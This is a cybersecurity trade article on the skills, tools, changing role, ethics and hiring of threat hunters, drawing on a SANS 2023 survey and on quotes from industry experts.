Skilled threat hunters can play a dual role for organizations, hunting for threat actors as well as ensuring budget is directed at tools and technology that will bolster the hunting capabilities, according to the SANS 2023 Threat Hunting survey. However, a lack of skilled staff is hampering the success of threat hunting efforts, according to the global survey of 564 respondents drawn from SOC analysts, security managers and administrators.
Adding to the task, threat hunters themselves are seeking more training, education, and support from management, the survey has found. As CISOs look ahead to 2024 and the cybersecurity challenges it will bring, what do they need from threat hunting teams and how should threat hunters themselves look to strengthen their skill set?
Technical skills for today’s threat analysts and how they’re evolving
Threat analysts require a blend of traditional and modern technical skills and all the experts speaking to CSO say that Python is indispensable for conducting efficient data analysis. Other important languages and tools to know include C, C++, JavaScript, Ruby on Rails, SQL, PowerShell, Burp Suite, Nessus, and Kali Linux. Foundational knowledge in networking and systems, data analysis skills, knowledge of cloud architectures, and reverse engineering are also regarded as useful.
Threat hunters need a general disposition towards researching complex problems with limited details, solving puzzles and evaluating risks. The task has, however, become more challenging for several reasons, according to Jake Williams, independent security consultant, IANS faculty member, and former senior SANS instructor. “As our perimeter defenses, like endpoint detection and response, have improved and threat actors have gotten better, hunting has become harder. It’s more advanced and requires more skills, and typically, it’s looking for anomalies in data,” he tells CSO.
Familiarity with threat intelligence platforms like MISP and security information and event management (SIEM) tools like Splunk, LogRythm, and ManageEngine are needed to identify and check exposure to threats, according to BugCrowd director of cybersecurity at bug bounty platform Sajeeb Lohani. “And working knowledge of the MITRE ATT&CK framework can help identify different tactics and techniques used during certain attacks. It can help the analyst point out different patterns of attack that others may miss,” Lohani tells CSO. Newer lightweight tools like Wazuh are becoming more prevalent to help identify and manage threats as the rise of cryptocurrencies has introduced mining activities into cybersecurity concerns.
Don’t overlook the value of soft skills in threat hunting
In addition to technical prowess, soft skills are equally important. For instance, the ability to succinctly explain threats to various parties is crucial, while attention to detail, analytical thinking, stress management, creativity, and teamwork are all seen as pivotal skills for the modern threat hunter.
Very often, for instance, there’s an urgent need to communicate a new vulnerability to different audiences, which demands tailored communications for technical teams, CISOs, and board members. Williams highlights task management and patience, especially when dealing with uncertain or misleading information, and above all, coordinating between different sources of information. “So much of threat hunting today relates to that living off the land kind of thing where you’re seeing things that look malicious. And so oftentimes you’re developing hypotheses and that involves consulting system admin and working toward a resolution,” says Williams. It’s also important to be flexible in your thinking and not close off your mind to one thing or another, he notes. “Those folks who can hold opposing viewpoints in their mind simultaneously are by far the best.”
How is the role of threat hunter changing?
The responsibilities of the threat hunter have shifted from traditional network monitoring to proactive threat hunting and intelligence gathering, which has meant significant upskilling and new priorities. “Unlike in the past, there’s less manual research and input on blacklists and less reliance on intrusion detection systems,” digital trust expert and ISACA non-executive director Niel Harper tells CSO. Tools able to analyze large amounts of data have come into the frame. “These threat detection tools are providing meaningful, actionable intelligence and prioritization of threats for threat hunters,” says Harper.
However, it’s created a lot of false positives, which has meant threat analysts needed to be trained to parse through the false flags to find indicators of compromise. Now with ML and AI and more automation, the role continues to evolve. Harper sees great value in research and analysis skills for threat hunters. “It helps in turning information from various tools into actionable intelligence,” Harper says.
The remit has also expanded to include cloud security monitoring and understanding log centralization and analysis, notes Christ Scott, security operations specialist with the Chaucer Group. “Attackers are targeting those spaces more frequently,” Scott tells CSO. Having worked with some large organizations, he’s seen the shift first-hand. “Someone will spin something up in the cloud and that opens up another attack surface, so you need to have someone proactively looking for the vulnerabilities.”
It’s also a mind game, with threat hunters needing to be highly adaptable as threats are changing daily, sometimes hourly. “You need to change with them. Never allow an inflexible mind to pervade your operational approach,” says Brian Hussey, VP of threat hunting, intelligence and DFIR at SentinelOne. At the same time, you also need to see the forest through the trees. “Often threat actors introduce surface changes to their attack patterns, but core modus operandi remains unchanged, leaving important opportunities to identify and eliminate new attacks, even before they arrive,” Hussey tells CSO.
ML and AI have a place, but are not everything
With the SANS survey indicating almost three-quarters of organizations need more training and skilled staff, AI and ML technologies may have a role to play. The experts all agree on the growing importance of ML and AI in enhancing threat hunting detection capabilities. “It can analyze large amounts of information in a short time and we’re seeing a lot more in intelligence from these tools as they can provide you with the best course of action to penetrate a target. This can optimize your exploitation effectiveness,” Harper says.
Outlier analysis, for instance, was once done manually but is now being baked into the tools, so having some understanding of data science and ML toolkits, many of which are exposed through Python, can significantly enhance threat detection capabilities, according to Williams. “You can utilize those immediately to help you find either the things that are very common, or the things that are very uncommon.”
Equally, they also caution against an over-reliance on ML and AI and stress the need for human oversight. For example, AI reduces the skill barrier, but these technologies can’t infer or question the way humans do. These tools should never blunt the power of human curiosity to ask ‘why’, notes Chaucer Group’s Scott. “It’s asking why is something doing that? It’s the ABC rule, assume nothing, believe nothing, confirm everything.”
How should threat hunters keep up with the changing threat landscape?
Continuous learning and adaptability are key to staying up to date as a threat hunter. Beginners need to start with the basics of networking and security, gradually moving into more complex areas. Engaging with online communities and utilizing online resources are also effective ways to stay informed. Hands-on experience in cybersecurity is key. Spend a couple of years in security ops center or working with incident response before moving into threat hunting, suggests Williams.
Harper recommends beginners start with the basics of networking and security, using resources available online and communities for guidance. “Connecting with communities of practitioners and professional associations is a way to share tools and information and advance along the learning path,” he says.
The ethical responsibilities threat hunters face
One of the overlooked aspects of threat hunters is the need to have a strong personal ethical framework, not divulging sensitive business information or misusing exploits or other information about potential vulnerabilities.
“You will run into several ethical considerations throughout your career,” says SentinelOne’s Hussey. Hacking back, or taking offensive actions against threat actors, hijacking an attacker’s cryptocurrency, negotiating with a ransomware threat actor and so on. “It’s essential to communicate your actions with your legal team and with your colleagues. When good people come together to do the right thing, it makes these hard topics much easier to define.” Then there’s the need to handle sensitive information responsibly and transparently and adhere to legal standards. “It’s making sure you protect and store information in a secure way with strong access controls, and if you share this information with third parties [that] they are trusted,” Harper says.
It’s also vital that threat hunters remain neutral when it comes to certain investigations, such as corporate espionage or investigating individuals. There’s a need to avoid starting with certain assumptions and to avoid making any assumptions and instead focus on being unbiased. Chaucer Group’s Scott highlights the potential ethical implications of threat hunting, emphasizing the responsibility to remain unbiased and protect sensitive information. “It’s following that ABC rule, making no assumptions and focusing on the data, and even ensuring a broader scope of data to avoid coming to a pre-determined conclusion.”
What else to look for when hiring threat hunters
A lack of skilled staff in threat hunting teams is the primary barrier to success. Like other areas of cybersecurity facing a skills gap, diverse hiring may be a solution, but how does this translate to threat hunting?
Harper advocates for an inclusive approach to cybersecurity, saying individuals from diverse educational backgrounds can excel in this field. “I don’t think you need to have a strict computer science or information technology background, as long as there’s an interest and a willingness and passion to learn.”
It also helps to have people who can see beyond the mechanics of a threat and even consider the larger aim or motivation of the attackers. “By grasping the ‘why’ behind an attack, analysts can better understand the ‘how’ and ‘when,’ allowing for more effective profiling of adversaries and strengthening of security measures against specific threat vectors,” says BugCrowd’s Lohani. “This helps inform risk assessment, prioritization of defense efforts, and development of more targeted security education programs for users. Having a grasp on the human element of cybersecurity is essential for a comprehensive defense strategy.”